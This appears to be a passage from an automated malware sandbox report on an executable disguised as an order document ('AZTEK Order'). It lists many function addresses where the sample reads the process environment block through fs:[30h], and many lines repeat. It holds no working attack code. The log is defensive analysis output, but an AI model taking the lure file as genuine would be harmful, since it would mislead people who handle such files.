            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F20F0 mov ecx, dword ptr fs:[00000030h]5_2_013F20F0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B80E9 mov eax, dword ptr fs:[00000030h]5_2_013B80E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AA0E3 mov ecx, dword ptr fs:[00000030h]5_2_013AA0E3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014480A8 mov eax, dword ptr fs:[00000030h]5_2_014480A8
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014760B8 mov eax, dword ptr fs:[00000030h]5_2_014760B8
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014760B8 mov ecx, dword ptr fs:[00000030h]5_2_014760B8
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01432349 mov eax, dword ptr fs:[00000030h]5_2_01432349
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147A352 mov eax, dword ptr fs:[00000030h]5_2_0147A352
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01458350 mov ecx, dword ptr fs:[00000030h]5_2_01458350
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143035C mov eax, dword ptr fs:[00000030h]5_2_0143035C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143035C mov eax, dword ptr fs:[00000030h]5_2_0143035C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143035C mov eax, dword ptr fs:[00000030h]5_2_0143035C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143035C mov ecx, dword ptr fs:[00000030h]5_2_0143035C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143035C mov eax, dword ptr fs:[00000030h]5_2_0143035C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143035C mov eax, dword ptr fs:[00000030h]5_2_0143035C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AC310 mov ecx, dword ptr fs:[00000030h]5_2_013AC310
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D0310 mov ecx, dword ptr fs:[00000030h]5_2_013D0310
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA30B mov eax, dword ptr fs:[00000030h]5_2_013EA30B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA30B mov eax, dword ptr fs:[00000030h]5_2_013EA30B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA30B mov eax, dword ptr fs:[00000030h]5_2_013EA30B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145437C mov eax, dword ptr fs:[00000030h]5_2_0145437C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014363C0 mov eax, dword ptr fs:[00000030h]5_2_014363C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146C3CD mov eax, dword ptr fs:[00000030h]5_2_0146C3CD
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014543D4 mov eax, dword ptr fs:[00000030h]5_2_014543D4
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014543D4 mov eax, dword ptr fs:[00000030h]5_2_014543D4
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E3DB mov eax, dword ptr fs:[00000030h]5_2_0145E3DB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E3DB mov eax, dword ptr fs:[00000030h]5_2_0145E3DB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E3DB mov ecx, dword ptr fs:[00000030h]5_2_0145E3DB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E3DB mov eax, dword ptr fs:[00000030h]5_2_0145E3DB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A8397 mov eax, dword ptr fs:[00000030h]5_2_013A8397
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A8397 mov eax, dword ptr fs:[00000030h]5_2_013A8397
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A8397 mov eax, dword ptr fs:[00000030h]5_2_013A8397
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D438F mov eax, dword ptr fs:[00000030h]5_2_013D438F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D438F mov eax, dword ptr fs:[00000030h]5_2_013D438F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE388 mov eax, dword ptr fs:[00000030h]5_2_013AE388
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE388 mov eax, dword ptr fs:[00000030h]5_2_013AE388
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE388 mov eax, dword ptr fs:[00000030h]5_2_013AE388
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E63FF mov eax, dword ptr fs:[00000030h]5_2_013E63FF
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE3F0 mov eax, dword ptr fs:[00000030h]5_2_013CE3F0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE3F0 mov eax, dword ptr fs:[00000030h]5_2_013CE3F0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE3F0 mov eax, dword ptr fs:[00000030h]5_2_013CE3F0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01438243 mov eax, dword ptr fs:[00000030h]5_2_01438243
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01438243 mov ecx, dword ptr fs:[00000030h]5_2_01438243
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A823B mov eax, dword ptr fs:[00000030h]5_2_013A823B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A250 mov eax, dword ptr fs:[00000030h]5_2_0146A250
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A250 mov eax, dword ptr fs:[00000030h]5_2_0146A250
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A826B mov eax, dword ptr fs:[00000030h]5_2_013A826B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4260 mov eax, dword ptr fs:[00000030h]5_2_013B4260
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4260 mov eax, dword ptr fs:[00000030h]5_2_013B4260
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4260 mov eax, dword ptr fs:[00000030h]5_2_013B4260
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6259 mov eax, dword ptr fs:[00000030h]5_2_013B6259
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AA250 mov eax, dword ptr fs:[00000030h]5_2_013AA250
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE284 mov eax, dword ptr fs:[00000030h]5_2_013EE284
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE284 mov eax, dword ptr fs:[00000030h]5_2_013EE284
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01430283 mov eax, dword ptr fs:[00000030h]5_2_01430283
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01430283 mov eax, dword ptr fs:[00000030h]5_2_01430283
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01430283 mov eax, dword ptr fs:[00000030h]5_2_01430283
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C02E1 mov eax, dword ptr fs:[00000030h]5_2_013C02E1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C02E1 mov eax, dword ptr fs:[00000030h]5_2_013C02E1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C02E1 mov eax, dword ptr fs:[00000030h]5_2_013C02E1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov ecx, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01446500 mov eax, dword ptr fs:[00000030h]5_2_01446500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E656A mov eax, dword ptr fs:[00000030h]5_2_013E656A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E656A mov eax, dword ptr fs:[00000030h]5_2_013E656A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E656A mov eax, dword ptr fs:[00000030h]5_2_013E656A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8550 mov eax, dword ptr fs:[00000030h]5_2_013B8550
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8550 mov eax, dword ptr fs:[00000030h]5_2_013B8550
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D45B1 mov eax, dword ptr fs:[00000030h]5_2_013D45B1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D45B1 mov eax, dword ptr fs:[00000030h]5_2_013D45B1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE59C mov eax, dword ptr fs:[00000030h]5_2_013EE59C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E4588 mov eax, dword ptr fs:[00000030h]5_2_013E4588
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B2582 mov eax, dword ptr fs:[00000030h]5_2_013B2582
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B2582 mov ecx, dword ptr fs:[00000030h]5_2_013B2582
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC5ED mov eax, dword ptr fs:[00000030h]5_2_013EC5ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC5ED mov eax, dword ptr fs:[00000030h]5_2_013EC5ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B25E0 mov eax, dword ptr fs:[00000030h]5_2_013B25E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014305A7 mov eax, dword ptr fs:[00000030h]5_2_014305A7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014305A7 mov eax, dword ptr fs:[00000030h]5_2_014305A7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014305A7 mov eax, dword ptr fs:[00000030h]5_2_014305A7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B65D0 mov eax, dword ptr fs:[00000030h]5_2_013B65D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA5D0 mov eax, dword ptr fs:[00000030h]5_2_013EA5D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA5D0 mov eax, dword ptr fs:[00000030h]5_2_013EA5D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE5CF mov eax, dword ptr fs:[00000030h]5_2_013EE5CF
